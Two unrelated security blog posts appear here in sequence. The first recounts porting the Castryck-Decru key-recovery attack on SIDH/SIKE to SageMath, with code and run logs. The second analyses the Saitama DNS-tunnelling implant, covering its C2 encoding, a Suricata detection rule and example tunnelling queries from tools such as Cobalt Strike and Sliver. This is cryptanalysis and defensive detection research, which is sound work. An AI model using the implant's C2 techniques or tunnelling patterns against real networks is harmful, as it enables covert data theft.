The work to reimplement the attack was split between fairly easy but busy work translating SIKE_challenge.m into valid SageMath and more careful and mathematical work reimplementing the functions in the helper file richelot_aux.m. If this attack worked it would then be a case of changing a handful of lines for the attack on SIKEp434, which was said to take about one hour to complete when running the Magma files.

Opening up richelot_aux.m, the first thing to do was to read through the functions and get an idea of the work ahead:

  • Does22ChainSplit()
    • The main oracle, which given the necessary curves and points returns True when the correct digit is guessed.
    • First thought: not too hard.
  • FromProdToJac() and FromJacToJac()
    • Helper functions for Does22ChainSplit() which takes us from points on an elliptic curve to points on the Jacobian of a hyperelliptic curve and then performs the Richelot isogenies.
    • First thought: very long with a couple scary lines which SageMath might have trouble with
  • Pushing3Chain()
    • Compute a chain of isogenies given a curve, quotienting out point of order 3^i .
    • First thought: easy. Very similar to code I’ve written before.
    • In fact thanks to a recent update to SageMath by Lorenz Panny, this could probably be swapped out for E.isogeny(K, algorithm="factored"). However, to align the code with the PoC, it was decided to reimplement the function as it appeared in the Magma code.
  • Pushing9Chain() and OddCyclicSumOfSquares()
    • Obsolete code, which could be simply ignored. OddCyclicSumOfSquares() is almost certainly the code which was used to precompute the values u,v in uvtable.m. As there’s no need to recompute this array, the function is not needed.

As the function is short, here’s the Magma, then SageMath version of Pushing3Chain(). This is a fair representation of how similar code written in Magma and SageMath is:

// Magma
function Pushing3Chain(E, P, i)
 // compute chain of isogenies quotienting out a point P of order 3^i
 Fp2 := BaseField(E);
 R<x> := PolynomialRing(Fp2);
 chain := [];
 C := E;
 remainingker := P;
 for j in [1..i] do
   kerpol := x - (3^(i-j)*remainingker)[1];
   C, comp := IsogenyFromKernel(C, kerpol);
   remainingker := comp(remainingker);
   chain cat:=[comp];
 end for;
 return C, chain;
end function;
# SageMath
def Pushing3Chain(E, P, i):
   # Compute chain of isogenies quotienting out a point P of order 3^i
   Fp2 = E.base()
   R.<x> = PolynomialRing(Fp2)
   chain = []
   C = E
   remainingker = P
   for j in range(1, i+1):
       kerpol = x - (3^(i-j)*remainingker)[0]
       comp = EllipticCurveIsogeny(C, kerpol)
       C = comp.codomain()
       remainingker = comp(remainingker)
       chain.append(comp)
   return C, chain

Aside from worrying about the helper functions, Does22ChainSplit() was just as simple to reimplement. SIKE_challenge.m itself was about 300 lines of syntax changes (switching out loops, populating arrays with integers). There was a bit of work composing some isogenies, computing Weil pairings and doing some elliptic curve arithmetic, but thanks to previous experience in writing similar code, the conversion went fairly smoothly.

Two functions to go, this was going to be done by lunch!

Warning: falling back to very slow toy implementation

The first major difficulty came while reimplementing FromProdToJac(). At a high level, this function takes points P,Q on an elliptic curve E and points P_C , Q_C on the elliptic curve C and computes the image of the points (P_C, P) and (Q_C, Q) on the Jacobian of a hyperelliptic curve. Hmm ok maybe that’s not such a high level.

Brushing aside what it does, let’s talk about how it tries to do this.

First, five multivariate equations in four variables are defined. Although the lines which do this look dense, the similarity between Magma and SageMath meant not much work was needed at all. The goal is to find a solution to all five equations, which can then be used to construct the necessary points on the Jacobian of the target hyperelliptic curve. Details of this process are is described in section 6.1 of the paper.

The standard method to solve systems of equations like this is to first build a Gröbner basis from the equations. Magma comes with GrobnerBasis() and it is very efficient and works with a wide range of polynomial rings. The following code snippet doesn’t obviously use GrobnerBasis(), instead a scheme is created from an affine space and the set of equations. Calling Points(V) on the scheme finds the set of points, which are equivalently the set of solutions to the polynomials! Points(V) does this by (in part) calling GrobnerBasis() under the hood.

A4<U0, U1, V0, V1> := AffineSpace(Fp2, 4);
V := Scheme(A4, [eq1, eq2, eq3, eq4, eq5]);

// point with zero coordinates probably correspond to "extra" solutions,
// we should be left with 4 sols (code may fail over small fields)

realsols := [];
for D in Points(V) do
   Dseq := Eltseq(D);
   if not 0 in Dseq then
       realsols cat:= [Dseq];
   end if;
end for;

Rewriting this in SageMath, we get something that looks very similar

A4.<U0, U1, V0, V1> = AffineSpace(Fp2, 4)
V = A4.subscheme([eq1, eq2, eq3, eq4, eq5])

# point with zero coordinates probably correspond to "extra" solutions,
# we should be left with 4 sols (code may fail over small fields)

realsols = []
for D in V.rational_points():
   Dseq = list(D)
   if not 0 in Dseq:
       realsols.append(Dseq)

Again, like Magma, this calls grobner_basis() under the hood to find the set of points. However, running this code, we get the following message from SageMath:

verbose 0 (3848: multi_polynomial_ideal.py, groebner_basis) Warning: falling back to very slow toy implementation.

Uh oh… Just how slow is very slow? When running the attack, FromProdToJac()would be called for each oracle request. This meant it would be called a few hundred times for the easiest $IKEp217 challenge and a magnitude more for the hardest parameter set.

To see how slow very slow was, the code was left running while some fresh coffee was brewed and coming back to the terminal, a second warning was now showing:

verbose 0 (3848: multi_polynomial_ideal.py, groebner_basis) Warning: falling back to very slow toy implementation.
verbose 0 (1081: multi_polynomial_ideal.py, dimension) Warning: falling back to very slow toy implementation.

Okay, so technically this is progress, but considering the Magma file was totally finished within five minutes, we would need a smarter way to solve this problem if there was any hope to have this script recover the secret key.

When in doubt, make things easier

The usual method when solving problems like this using SageMath is to go crawling through the documentation. This wasn’t the first time a problem like this had come up while implementing algorithms and so the hope was some new ideas would start jumping out if enough documentation was read through.

Years of research experience quickly suggested that the first thing to do was to simply reduce the complexity of the problem. The file SIKE_challenge.sage was rewritten as the new baby_SIDH.sage, which shared a very similar structure, but now with a much smaller, 64-bit prime. The hope was to find something which worked reasonably on this smaller problem then worry later about making it more efficient after it was confirmed that the attack worked.

To create baby SIDH SIKEp64, first a prime was found such that p \equiv 3 \pmod 4 and p = 2^a 3^b - 1:

# Baby SIKEp64 parameters
a = 33
b = 19
p = 2^a*3^b - 1

Then reusing some old code from other isogeny projects, fresh public torsion points were generated as well:

def get_l_torsion_basis(E, l):
   n = (p+1) // l
   return (n*G for G in E.gens())

P2, Q2 = get_l_torsion_basis(E_start, 2^a)
P3, Q3 = get_l_torsion_basis(E_start, 3^b)

# Make sure Torsion points are
# generated correctly
assert 2^(a-1)*P2 != infty
assert 3^(b-1)*P3 != infty
assert P2.weil_pairing(Q2, 2^a)^(2^(a-1)) != 1
assert P3.weil_pairing(Q3, 3^b)^(3^(b-1)) != 1

Using the baby parameters with a SIDH key generation, the public data could be pushed back into the attack and…

verbose 0 (3848: multi_polynomial_ideal.py, groebner_basis) Warning: falling back to very slow toy implementation.
verbose 0 (1081: multi_polynomial_ideal.py, dimension) Warning: falling back to very slow toy implementation.

After letting this run for about 30 minutes the program was exited. It was obvious that this method was the wrong avenue for the SageMath implementation. Back to the drawing board.

The things you can do with friends by your SIDH

While fishing around more and more specific searches such as “sagemath fast groebner basis multivariate polynomial ring” (this is the page that seems like the solution should be in, but nothing ever quite worked) I additionally asked my CryptoHack friends for advice and made a tweet explaining the problem.

SageMath is used by a lot of people in the crypto community, and often people find clever tricks when solving puzzles and CTF challenges which come in handy in times like this. The hope was that someone had solved a similar problem before and could point toward the correct way to construct the solution.

Pretty quickly after reaching out to people, some really cool suggestions were offered. The power of the internet!

  • Lorenz Panny suggested to Weil restrict the equations by introducing an extra variable and move from working in F_{p^2} to F_p
    • This meant the toy implementation of Gröbner was not needed anymore as the polynomial ring would be defined over a simpler field, but now the system of equations was so complicated, the code was still too slow
  • Tony Shaska suggested that instead of computing the Gröbner bases, a faster method could be to instead use resultants to remove variables from the equation one at a time and then solve the equation in a univariate polynomial ring and work backwards.
    • This is a clever idea but SageMath was still too inefficient. The only method I had to compute resultants for the polynomial ring was using the determinant of the Sylvester matrix and this is very slow.
  • Bryan Gillespie suggested to try and use the Macaulay2 interface to compute the Gröbner basis. This doesn’t come with SageMath by default, but is free and open-source and can be included pretty easily. It’s also known for being pretty fast
    • This might work, but the current SageMath interface doesn’t allow for sending extension fields to Macaulay2 (it’s not even certain from the documentation that Macaulay2 can do this, but the SageMath interface certainly can’t). For this to have a chance at working, one would first have to re-write the interface.

The solution came from Rémy Oudompheng, who saw a way to avoid the problem altogether:

Are you trying to lift a pair (P, Pc) to the Jacobian? I wonder if it’s easier to lift (P, 0) to a divisor on H, lift (0, Pc) to a divisor and add them? I may be confused but it feels like it gives the answer without solving any equation

Original Tweet

Rémy joined me in the CryptoHack discord and we started chatting more about how this could solve the problem. His novel solution to the lifting described in section 6.1 seemed to be working, and what’s more, the same ideas would carry over to the JacToJac() function. Only days after the initial attack, it was wonderful seeing new perspectives on how to efficiently solve the problem.

This is a beautiful result and I’m really happy to have had the time working with Rémy on this. I never would have had the above insight to dodge the slow toy implementation and it gave me an opportunity to learn more about hyperelliptic curves.

Piecing it all together

While Rémy worked on his novel implementation for FromProdToJac() and FromJacToJac(), the remaining work was to go through the rest of the Magma code and convert it to valid SageMath. With these last two functions finished and the rest of the attack all scripted, it was time to see whether the algorithm could recover Bob’s private key given only public data generated from the baby SIDH parameters.

Before the gratification of a successful run, as is usual with late night coding, some additional off by one errors were introduced and then removed while Rémy pushed the new hyperelliptic lifting and Richelot isogeny code. We both ran our script, which failed dramatically in the last few lines when constructing the private key thanks to more syntax errors:

key = sum(skB[i]*3^(i-1) for i in range(1..b-2))
TypeError: 'generator' object cannot be interpreted as an integer

Off by one and a remaining .. in the range!! Fixing this to what should have been written all along:

# Magma
# key := &+[skB[i]*3^(i-1) : i in [1..b-3]];
# SageMath
key = sum(skB[i]*3^i for i in range(b-3))

the following output appeared in the terminal:

Bridging last gap took: 0.1307520866394043
Bob's secret key revealed as: 15002860
In ternary, this is: [1, 1, 1, 1, 0, 0, 0, 2, 0, 0, 2, 0, 1, 0, 0, 1]
Altogether this took 43.73990249633789 seconds.

It worked!! The attack successfully recovered Bob’s private key in less than a minute, all thanks to some brilliant mathematics. It was so exciting to see Wouter Castryck and Thomas Decru’s attack run in real time on a laptop.

However, a 64-bit prime wasn’t close to being secure from previously known attacks. So, with confidence that the code was correct, the next test was to see whether the implementation was efficient enough to recover private keys on serious SIDH instances. Could it keep up with the Magma implementation?

Monkeying around with cache optimisation

Running the same attack on the SIKE challenge, the code worked but it was incredibly slow. Something along the way was inefficient as our prime grew, so the new task was to try and identify the sluggish code and clean it up. Profiling the script, most of the run time is spent in JacToJac(). This isn’t surprising, as it’s run approximately 100 times for each oracle call, so it is expected to be dominant in the profiling. However, the recorded slow-down from the baby SIDH parameters seemed much more significant that one would expect by approximately tripling the bit-size of the prime.

With some further analysis, the dramatic slowdown of the algorithm was identified. The root of the problem was due to a SageMath performance issue where rather than caching FiniteField objects they are reconstructed every time they are called. The function JacToJac() is particularly effected due to the heavy use of the group law for the Jacobian of a hyperelliptic curve.

When testing equality of points, the code invokes GF(p^k)(...) for all coefficients. The constructor of the FiniteField includes a primality test of p for every call. As this is called on every coefficient of every point when performing arithmetic operations, we’re constructing objects and performing primality tests thousands of times. The larger the prime, the more expensive this construction becomes.

Rémy decided to fix this issue this by patching SageMath itself, modifying sage.categories.fields so that the vector space is cached:

from sage.misc.cachefunc import cached_method

@cached_method
def vector_space(self, *args, **kwds):
   ...

This ensures that each distinct vector field is constructed only once.

With this fix, the implementation broke the $IKEp217 challenge in only 15 minutes. Not bad when compared to the purported Magma time of approximately 5 minutes.

Bridging last gap took: 6.489821910858154
Bob's secret key revealed as: 5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx2
In ternary, this is: [0, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, 1]
Altogether this took 795.5218527317047 seconds.
sage SIKE_challenge.sage 785.42s user 22.78s system 101% cpu 13:19.19 total

Overnight, Rémy also ran the attack on the SIKEp434 parameter set. The secret key was recovered in only an hour and a half, amazing result when the Magma implementation took approximately one hour!

Bridging last gap took: 14.06521987915039
Bob's secret key revealed as: 107365402940497059258054462948684901858655170389077481076399249199
In ternary, this is: [2, 1, 2, 1, 1, 0, 1, 2, 0, 2, 1, 0, 1, 2, 2, 2, 1, 0, 2, 1, 0, 2, 1, 2, 2, 2, 1, 1, 1, 0, 0, 2, 2, 0, 1, 1, 2, 2, 2, 0, 2, 1, 0, 1, 0, 0, 0, 0, 0, 0, 2, 2, 0, 2, 0, 0, 2, 1, 1, 1, 0, 0, 2, 1, 2, 1, 0, 2, 1, 2, 1, 0, 1, 1, 0, 2, 1, 0, 2, 1, 0, 0, 1, 1, 0, 0, 2, 2, 2, 0, 2, 2, 0, 1, 1, 1, 0, 0, 0, 2, 1, 0, 2, 0, 1, 0, 1, 0, 1, 2, 1, 2, 2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 1, 0, 0, 0, 1, 1, 2, 0, 1, 1, 1, 0, 1, 1]
Altogether this took 5233.838165044785 seconds.

The next morning, inspired by these results, the goal was to find a way to have this same performance without directly patching SageMath. The motivation for this reimplementation was to allow people to run the code themselves and it was important to make this as easy as possible.

A gentler fix was to set the flag proof.arithmetic(False) in the code. This globally tells SageMath to use (among many things) a much faster, probabilistic primality test. We’re not worried about false positives this could (very rarely) introduce, as we are working with a known, fixed prime. As an example of how dramatic this speed up is, a primality test of a 1024 bit integer is more than 1000 times as fast:

sage: p = random_prime(2^1024)
sage: time is_prime(p)
CPU times: user 2.83 s, sys: 13.4 ms, total: 2.85 s
Wall time: 2.86 s
True
sage: proof.arithmetic(False)
sage: time is_prime(p)
CPU times: user 2.1 ms, sys: 0 ns, total: 2.1 ms
Wall time: 2.11 ms
True

This doesn’t address the construction of the vector space again and again, but by dropping the expensive primality test on every call the hope that it’s fast enough (or at least a good start).

By including the proof flag into the script, SIKE_challenge.sage broke the $IKEp217 challenge in 30 minutes without any additional patches:

Bridging last gap took: 9.461672067642212
Bob's secret key revealed as: 5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx2
In ternary, this is: [0, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, 1]
Altogether this took 1799.0663061141968 seconds.

However, while this code was running Robin Jadoul found a way to achieve the same result as Rémy’s SageMath patch with the following in-line monkey patch by including

Fp2.<i> = GF(p^2, modulus=x^2+1)
type(Fp2).vector_space = sage.misc.cachefunc.cached_method(type(Fp2).vector_space)

This ensures the vector field is cached as in Rémy’s patch, but the fix can be done during run time. This allows all users of the script to get the speed up without modifying the SageMath source. This is a really important fix, so huge thanks to Robin. Without it, the hardest parameter sets would have been out of reach without hard-patching SageMath.

Optimising using mathematics

The next set of performance enhancements are thanks to Rémy’s optimizations of the function JacToJac(). This is the obvious place to focus as it’s where the attack spends most of its time. Optimisations can be viewed in the following pull requests:

Accumulatively, these performance enhancements are fantastic and we see more than a 3-times speed up for the code, pushing the SageMath implementation to be more performant than the Magma implementation!

Optimising using better SageMath practices

The last speed ups came from running profilers on our code and adjusting how objects were called to avoid slowdown from how Python was constructing and manipulating polynomials, points and Jacobians and isogenies. A non-exhaustive list of tricks we used:

  • Hard-code dimension of curve #10
    • When constructing the Jacobian of a hyperelliptic curve, an expensive, redundant computation of the curve’s dimension is performed (a curve’s dimension is always 1). We applied a monkey patch to address this.
  • Twice faster Jacobian quotients #13
    • Using points rather than polynomials for the isogeny kernel uses Vélu’s formulas rather than Kohel’s formulas, which are faster.
    • Elliptic isogenies were made more performant by passing the known degree as an optional argument and removing the internal validity check.

Breaking SIDH on a laptop

To celebrate, let’s look at the recored runtimes of our implementation across all parameters.

Vanilla 🍦 No Proof 😴 Monkey Patch 🐵 Current Version 🏃🏻💨
Baby SIDH (SIKEp64) 1 minute 1 minute 1 minute 5 seconds
$IKEp217 Challenge 30 minutes 15 minutes 2 minutes
SIKEp434 1.5 hours 10 minutes
SIKEp503 3.5 hours 15 minutes
SIKEp610 25 minutes
SIKEp751 1-2 hours
All recorded times were achieved on a MacBook with Intel i7 CPU @ 2.6 GHz on a single core. Elements of the table without an entry haven’t been run.

Although most digits of the key can be recovered one by one, the first set of digits must be collected together. For SIKEp64, $IKEp217 and SIKEp434 only the first two digits need to be collected together, with a worst case of 3^2 = 9 calls to the oracle to recover the values.

However:

  • For SIKEp503 the worst case is we make 3^4 = 81 calls for the first 4 digits.
  • For SIKEp610 the worst case is we make 3^5 = 243 calls for the first 5 digits.
  • For SIKEp751 the worst case is we make 3^6 = 729 calls for the first 6 digits.

This means that in the worst case when attacking SIKEp751 more than half of the computation time is spent collecting the first 6 of the 239 digits!

Estimating the running time

We can estimate an average running time from the expected number of calls to the oracle Does22ChainSplit(). This still won’t be totally accurate but gives some rough estimates which seem to agree with our recorded values.

  • For the first \beta_1 digits, at most 3^{\beta_1} calls to Does22ChainSplit() are needed and half of this on average
  • For the remaining b - \beta_1 digits Does22ChainSplit() is called only once when j = 0 and twice when j = 1 or j = 2. It is then expected on average to call the oracle once a third of the time and twice for the remaining two thirds of the digits.

Expressing the approximate time cost of a single call of Does22ChainSplit() as c, the estimate the total cost can be expressed as:

\displaystyle \textsf{Cost} = c \cdot \frac{3^{\beta_1}}{2} + c \cdot \frac{(b - \beta_1)}{3} + 2c \cdot \frac{2(b - \beta_1)}{3}

Which looks slightly cleaner written as:

\displaystyle \textsf{Cost} = c \left(\frac{3^{\beta_1}}{2} + \frac{5(b - \beta_1)}{3} \right), \; \; \textsf{Worst Start} = c \left(3^{\beta_1} + \frac{5(b - \beta_1)}{3} \right)

Parameters c \beta_1 Average Cost Worst Case Start
SIKEp64 0.2s 2 5 seconds 7 seconds
$IKEp217 1s 2 2 minutes 2 minutes
SIKEp434 3.4s 2 13 minutes 13 minutes
SIKEp503 4.5s 4 22 minutes 25 minutes
SIKEp610 6s 5 43 minutes 1 hour
SIKEp751 8.4s 6 1.75 hours 2.6 hours
Here, c has been estimated using a MacBook Pro using a Intel Core i7 CPU @ 2.6 GHz. Note: as c was benchmarked from the first oracle calls, these are over-estimates, as the oracle calls become faster as more digits are collected.

Conclusions

As a community, the plan is to keep working on our implementation, attempting to make the code more readable and performant. The end-goal is for this implementation to be a valuable resource that students and researchers can use to learn about this truly beautiful attack.

Furthermore, the community should continue to work together on SageMath. It’s an incredible resource, and the hope is that this blog post is an indication of how versatile and powerful it can be at implementing very high-level mathematics.

Some of problems we encountered along the way have already been submitted to be taken into the next release of SageMath. In particular, Lorenz Panny has fixed the need for including the monkey patch for the Finite Field caching.

The performance enhancements that we have included in our implementation just show how much more room there is to develop this attack and our understanding of the relationship between elliptic curves and higher dimensional Jacobians in cryptanalysis.

Congratulations to Wouter Castryck and Thomas Decru!

What’s next for isogenies?

  • With only a preliminary version of the attack on eprint, it will take the full paper, and community research time to really understand how far the Castryck-Decru attack can be generalised.
  • Unlike some historic attacks, simply increasing key sizes for SIKE is not sufficent. If SIDH is to reappear as a cryptographic protocol, it will need a design overhaul to remove all structure which this attack relies on for key recovery.
    • As this blog post is edited, a proposal to modify SIDH to protect against this attack: Masked-degree SIDH by Tomoki Moriya has appeared on eprint.
  • Other isogeny protocols such as CSIDH and SQISign seem to be safe from this attack. This is because neither of these protocols have a known secret isogeny degree or the image of the torsion points in public data.
  • More generally, the appearance of such a brilliant attack on a cryptosystem that stood unbroken for a decade will shake confidence in constructing protocols using isogeny problems. From the experts, the message is that there’s a lot of research to do now, which can only lead to more exciting results.

Acknowledgements

Many thanks to Rémy Oudompheng for collaboratoring with me on this project and teaching me so much about higher-genus isogenies. My additional thanks to Rémy Oudompheng and Lorenz Panny for feedback on my description of the attack, and my collegues at NCC Group: Paul Bottinelli, Kevin Henry, Elena Bakos Lang and Thomas Pornin for their valuable feedback on an earlier draft of this blog post.

Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study 

By: Max Groot
11 August 2022 at 15:20

Max Groot & Ruud van Luijk

TL;DR

A recently uncovered malware sample dubbed ‘Saitama’ was uncovered by security firm Malwarebytes in a weaponized document, possibly targeted towards the Jordan government. This Saitama implant uses DNS as its sole Command and Control channel and utilizes long sleep times and (sub)domain randomization to evade detection. As no server-side implementation was available for this implant, our detection engineers had very little to go on to verify whether their detection would trigger on such a communication channel. This blog documents the development of a Saitama server-side implementation, as well as several approaches taken by Fox-IT / NCC Group’s Research and Intelligence Fusion Team (RIFT) to be able to detect DNS-tunnelling implants such as Saitama.

Introduction

For its Managed Detection and Response (MDR) offering, Fox-IT is continuously building and testing detection coverage for the latest threats. Such detection efforts vary across all tactics, techniques, and procedures (TTP’s) of adversaries, an important one being Command and Control (C2). Detection of Command and Control involves catching attackers based on the communication between the implants on victim machines and the adversary infrastructure.  

In May 2022, security firm Malwarebytes published a two1-part2 blog about a malware sample that utilizes DNS as its sole channel for C2 communication. This sample, dubbed ‘Saitama’, sets up a C2 channel that tries to be stealthy using randomization and long sleep times. These features make the traffic difficult to detect even though the implant does not use DNS-over-HTTPS (DoH) to encrypt its DNS queries.  

Although DNS tunnelling remains a relatively rare technique for C2 communication, it should not be ignored completely. While focusing on Indicators of Compromise (IOC’s) can be useful for retroactive hunting, robust detection in real-time is preferable. To assess and tune existing coverage, a more detailed understanding of the inner workings of the implant is required. This blog will use the Saitama implant to illustrate how malicious DNS tunnels can be set-up in a variety of ways, and how this variety affects the detection engineering process.  

To assist defensive researchers, this blogpost comes with the publication of a server-side implementation of Saitama. This can be used to control the implant in a lab environment. Moreover, ‘on the wire’ recordings of the implant that were generated using said implementation are also shared as PCAP and Zeek logs. This blog also details multiple approaches towards detecting the implant’s traffic, using a Suricata signature and behavioural detection. 

Reconstructing the Saitama traffic 

The behaviour of the Saitama implant from the perspective of the victim machine has already been documented elsewhere3. However, to generate a full recording of the implant’s behaviour, a C2 server is necessary that properly controls and instructs the implant. Of course, the source code of the C2 server used by the actual developer of the implant is not available. 

If you aim to detect the malware in real-time, detection efforts should focus on the way traffic is generated by the implant, rather than the specific domains that the traffic is sent to. We strongly believe in the “PCAP or it didn’t happen” philosophy. Thus, instead of relying on assumptions while building detection, we built the server-side component of Saitama to be able to generate a PCAP. 

The server-side implementation of Saitama can be found on the Fox-IT GitHub page. Be aware that this implementation is a Proof-of-Concept. We do not intend on fully weaponizing the implant “for the greater good”, and have thus provided resources to the point where we believe detection engineers and blue teamers have everything they need to assess their defences against the techniques used by Saitama.  

Let’s do the twist

The usage of DNS as the channel for C2 communication has a few upsides and quite some major downsides from an attacker’s perspective. While it is true that in many environments DNS is relatively unrestricted, the protocol itself is not designed to transfer large volumes of data. Moreover, the caching of DNS queries forces the implant to make sure that every DNS query sent is unique, to guarantee the DNS query reaches the C2 server.  

For this, the Saitama implant relies on continuously shuffling the character set used to construct DNS queries. While this shuffle makes it near-impossible for two consecutive DNS queries to be the same, it does require the server and client to be perfectly in sync for them to both shuffle their character sets in the same way.  

On startup, the Saitama implant generates a random number between 0 and 46655 and assigns this to a counter variable. Using a shared secret key (“haruto” for the variant discussed here) and a shared initial character set (“razupgnv2w01eos4t38h7yqidxmkljc6b9f5”), the client encodes this counter and sends it over DNS to the C2 server. This counter is then used as the seed for a Pseudo-Random Number Generator (PRNG). Saitama uses the Mersenne Twister to generate a pseudo-random number upon every ‘twist’. 

Function used by Saitama client to convert an integer into an encoded string

To encode this counter, the implant relies on a function named ‘_IntToString’. This function receives an integer and a ‘base string’, which for the first DNS query is the same initial, shared character set as identified in the previous paragraph. Until the input number is equal or lower than zero, the function uses the input number to choose a character from the base string and prepends that to the variable ‘str’ which will be returned as the function output. At the end of each loop iteration, the input number is divided by the length of the baseString parameter, thus bringing the value down. 

To determine the initial seed, the server has to ‘invert’ this function to convert the encoded string back into its original number. However, information gets lost during the client-side conversion because this conversion rounds down without any decimals. The server tries to invert this conversion by using simple multiplication. Therefore, the server might calculate a number that does not equal the seed sent by the client and thus must verify whether the inversion function calculated the correct seed. If this is not the case, the server literately tries higher numbers until the correct seed is found.   

Once this hurdle is taken, the rest of the server-side implementation is trivial. The client appends its current counter value to every DNS query sent to the server. This counter is used as the seed for the PRNG. This PRNG is used to shuffle the initial character set into a new one, which is then used to encode the data that the client sends to the server. Thus, when both server and client use the same seed (the counter variable) to generate random numbers for the shuffling of the character set, they both arrive at the exact same character set. This allows the server and implant to communicate in the same ‘language’. The server then simply substitutes the characters from the shuffled alphabet back into the ‘base’ alphabet to derive what data was sent by the client.  

Server-side implementation to arrive at the same shuffled alphabet as the client

Twist, Sleep, Send, Repeat

Many C2 frameworks allow attackers to manually set the minimum and maximum sleep times for their implants. While low sleep times allow attackers to more quickly execute commands and receive outputs, higher sleep times generate less noise in the victim network. Detection often relies on thresholds, where suspicious behaviour will only trigger an alert when it happens multiple times in a certain period.  

The Saitama implant uses hardcoded sleep values. During active communication (such as when it returns command output back to the server), the minimum sleep time is 40 seconds while the maximum sleep time is 80 seconds. On every DNS query sent, the client will pick a random value between 40 and 80 seconds. Moreover, the DNS query is not sent to the same domain every time but is distributed across three domains. On every request, one of these domains is randomly chosen. The implant has no functionality to alter these sleep times at runtime, nor does it possess an option to ‘skip’ the sleeping step altogether.  

Sleep configuration of the implant. The integers represent sleep times in milliseconds

These sleep times and distribution of communication hinder detection efforts, as they allow the implant to further ‘blend in’ with legitimate network traffic. While the traffic itself appears anything but benign to the trained eye, the sleep times and distribution bury the ‘needle’ that is this implant’s traffic very deep in the haystack of the overall network traffic.  

For attackers, choosing values for the sleep time is a balancing act between keeping the implant stealthy while keeping it usable. Considering Saitama’s sleep times and keeping in mind that every individual DNS query only transmits 15 bytes of output data, the usability of the implant is quite low. Although the implant can compress its output using zlib deflation, communication between server and client still takes a lot of time. For example, the standard output of the ‘whoami /priv’ command, which once zlib deflated is 663 bytes, takes more than an hour to transmit from victim machine to a C2 server. 

Transmission between server implementation and the implant

The implant does contain a set of hardcoded commands that can be triggered using only one command code, rather than sending the command in its entirety from the server to the client. However, there is no way of knowing whether these hardcoded commands are even used by attackers or are left in the implant as a means of misdirection to hinder attribution. Moreover, the output from these hardcoded commands still has to be sent back to the C2 server, with the same delays as any other sent command. 

Detection

Detecting DNS tunnelling has been the subject of research for a long time, as this technique can be implemented in a multitude of different ways. In addition, the complications of the communication channel force attackers to make more noise, as they must send a lot of data over a channel that is not designed for that purpose. While ‘idle’ implants can be hard to detect due to little communication occurring over the wire, any DNS implant will have to make more noise once it starts receiving commands and sending command outputs. These communication ‘bursts’ is where DNS tunnelling can most reliably be detected. In this section we give examples of how to detect Saitama and a few well-known tools used by actual adversaries.  

Signature-based 

Where possible we aim to write signature-based detection, as this provides a solid base and quick tool attribution. The randomization used by the Saitama implant as outlined previously makes signature-based detection challenging in this case, but not impossible. When actively communicating command output, the Saitama implant generates a high number of randomized DNS queries. This randomization does follow a specific pattern that we believe can be generalized in the following Suricata rule: 

alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT - Trojan - Possible Saitama Exfil Pattern Observed"; flow:stateless; content:"|00 01 00 00 00 00 00 00|"; byte_test:1,>=,0x1c,0,relative; fast_pattern; byte_test:1,<=,0x1f,0,relative; dns_query; content:"."; content:"."; distance:1; content:!"."; distance:1; pcre:"/^(?=[0-9]+[a-z]\|[a-z]+[0-9])[a-z0-9]{28,31}\.[^.]+\.[a-z]+$/"; threshold:type both, track by_src, count 50, seconds 3600; classtype:trojan-activity; priority:2; reference:url, https://github.com/fox-it/saitama-server; metadata:ids suricata; sid:21004170; rev:1;) 

This signature may seem a bit complex, but if we dissect this into separate parts it is intuitive given the previous parts. 

Content Match  Explanation 
00 01 00 00 00 00 00 00  DNS query header. This match is mostly used to place the pointer at the correct position for the byte_test content matches. 
byte_test:1,>=,0x1c,0,relative;  Next byte should be at least decimal 25. This byte signifies the length of the coming subdomain 
byte_test:1,<=,0x1f,0,relative;  The same byte as the previous one should be at most 31. 
dns_query; content:”.”; content:”.”; distance:1; content:!”.”;  DNS query should contain precisely two ‘.’ characters 
pcre:”/^(?=[0-9][a-z]|[a-z][0-9])[a-z0-9] {28,31} 
\.[^.]\.[a-z]$/”; 
Subdomain in DNS query should contain at least one number and one letter, and no other types of characters.
threshold:type both, track by_src, count 50, seconds 3600  Only trigger if there are more than 50 queries in the last 3600 seconds. And only trigger once per 3600 seconds. 
Table one: Content matches for Suricata IDS rule

 
The choice for 28-31 characters is based on the structure of DNS queries containing output. First, one byte is dedicated to the ‘send and receive’ command code. Then follows the encoded ID of the implant, which can take between 1 and 3 bytes. Then, 2 bytes are dedicated to the byte index of the output data. Followed by 20 bytes of base-32 encoded output. Lastly the current value for the ‘counter’ variable will be sent. As this number can range between 0 and 46656, this takes between 1 and 5 bytes. 

Behaviour-based 

The randomization that makes it difficult to create signatures is also to the defender’s advantage: most benign DNS queries are far from random. As seen in the table below, each hack tool outlined has at least one subdomain that has an encrypted or encoded part. While initially one might opt for measuring entropy to approximate randomness, said technique is less reliable when the input string is short. The usage of N-grams, an approach we have previously written about4, is better suited.  

Hacktool  Example 
DNScat2  35bc006955018b0021636f6d6d616e642073657373696f6e00.domain.tld5 
Weasel  pj7gatv3j2iz-dvyverpewpnnu–ykuct3gtbqoop2smr3mkxqt4.ab.abdc.domain.tld 
Anchor  ueajx6snh6xick6iagmhvmbndj.domain.tld6 
Cobalt Strike  Api.abcdefgh0.123456.dns.example.com or   post. 4c6f72656d20697073756d20646f6c6f722073697420616d65742073756e74207175697320756c6c616d636f20616420646f6c6f7220616c69717569702073756e7420636f6d6d6f646f20656975736d6f642070726.c123456.dns.example.com 
Sliver  3eHUMj4LUA4HacKK2yuXew6ko1n45LnxZoeZDeJacUMT8ybuFciQ63AxVtjbmHD.fAh5MYs44zH8pWTugjdEQfrKNPeiN9SSXm7pFT5qvY43eJ9T4NyxFFPyuyMRDpx.GhAwhzJCgVsTn6w5C4aH8BeRjTrrvhq.domain.tld 
Saitama  6wcrrrry9i8t5b8fyfjrrlz9iw9arpcl.domain.tld 
Table two: Example DNS queries for various toolings that support DNS tunnelling

